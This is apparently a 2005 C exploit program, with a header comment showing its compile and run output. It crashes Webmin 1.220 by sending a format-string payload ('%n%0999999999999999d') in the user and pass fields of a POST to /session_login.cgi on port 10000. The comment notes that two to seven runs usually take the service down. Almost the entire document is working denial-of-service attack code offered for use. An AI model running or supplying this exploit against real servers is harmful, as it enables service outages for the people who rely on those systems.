/* Webmin Format string bug DoS sploit :) it took out few minutes of my life... Tested against Webmin Version 1.220 on FreeBSD 6 and perl 5.8.7 (Webmin crashes) http://www.critical.lt/research/webmin_dos.c [mircia@critical ~ ] cc webmin_dos.c -o webdos webmin_dos.c: In function `main': webmin_dos.c:77: warning: passing arg 1 of `sprintf' from incompatible pointer type webmin_dos.c:79: warning: passing arg 1 of `sprintf' from incompatible pointer type webmin_dos.c:82: warning: passing arg 1 of `strlen' from incompatible pointer type webmin_dos.c:84: warning: passing arg 1 of `strlen' from incompatible pointer type [mircia@critical ~ ] ./webdos localhost Quick'n'Dirty DoS exploit to webmin's format string bug (c) Critical Security, 2005-11[*] Initiating attack against localhost done [mircia@critical ~ ] ./webdos localhost Quick'n'Dirty DoS exploit to webmin's format string bug (c) Critical Security, 2005-11[*] Initiating attack against localhost done [mircia@critical ~ ] ./webdos localhost Quick'n'Dirty DoS exploit to webmin's format string bug (c) Critical Security, 2005-11[*] Initiating attack against localhost done [mircia@critical ~ ] ./webdos localhost Quick'n'Dirty DoS exploit to webmin's format string bug (c) Critical Security, 2005-11[*] Initiating attack against localhost done [mircia@critical ~ ] ./webdos localhost Quick'n'Dirty DoS exploit to webmin's format string bug (c) Critical Security, 2005-11[*] Initiating attack against localhost done [mircia@critical ~ ] ./webdos localhost Quick'n'Dirty DoS exploit to webmin's format string bug (c) Critical Security, 2005-11[*] Initiating attack against localhost connect: Connection refused Webmin is probably down... Usually 2-7 times are enough, if patched you will probably be banned after 5 times by default :) */ #include #include #include #include #include #include #define PORT 10000 // change it int main(int argc, char *argv[]) { int s; register int bytes; struct sockaddr_in sa; struct hostent *he; char buf[BUFSIZ+1]; char *host; if ((s = socket(PF_INET, SOCK_STREAM, 0)) < 0) { perror("pizute"); return 1; } bzero(&sa, sizeof sa); sa.sin_family = AF_INET; if (argc <= 1) { printf("%s%s%s","Usage: ",argv[0]," hostname or ip\n\n"); } else { host = (char *)argv[1]; sa.sin_port = htons(PORT); if ((he = gethostbyname(host)) == NULL) { perror(host); return 2; } printf ("Quick'n'Dirty DoS exploit to webmin's format string bug (c) Critical Security, 2005-11"); printf ("%s%s%s","[*] Initiating attack against ",host, "\n"); bcopy(he->h_addr_list[0],&sa.sin_addr, he->h_length); if (connect(s, (struct sockaddr *)&sa, sizeof sa) < 0) { perror("connect"); printf("Webmin is probably down...\n"); close(s); return 2; } // actually the code is so dirty that sometimes u just have to think why does this crap work char *req = "POST /session_login.cgi HTTP/1.1\nUser-Agent: Mozilla/4.0\n"; char *hostline[200]; char *req1 = "Accept: text/html, application/xml;q=0.9\nAccept-Language: en\nAccept-Encoding: deflate\nConnection: Keep-Alive\nCookie: testing=1; path=/\nContent-Type: application/x-www-form-urlencoded\nContent-Length: "; char *dashit = "\npage=%2F&user=%25n%250999999999999999d&pass=%25n%250999999999999999d\n\n"; char *ilgis[100]; sprintf(hostline,"%s%s%s%d\n","Host: ",host,":",PORT); sprintf(ilgis,"%d\n",strlen(dashit) - 3); write(s,req,strlen(req)); write(s,hostline,strlen(hostline)); write(s,req1,strlen(req1)); write(s,ilgis,strlen(ilgis)); write(s,dashit,strlen(dashit)); printf("done\n"); close(s); return 0; }}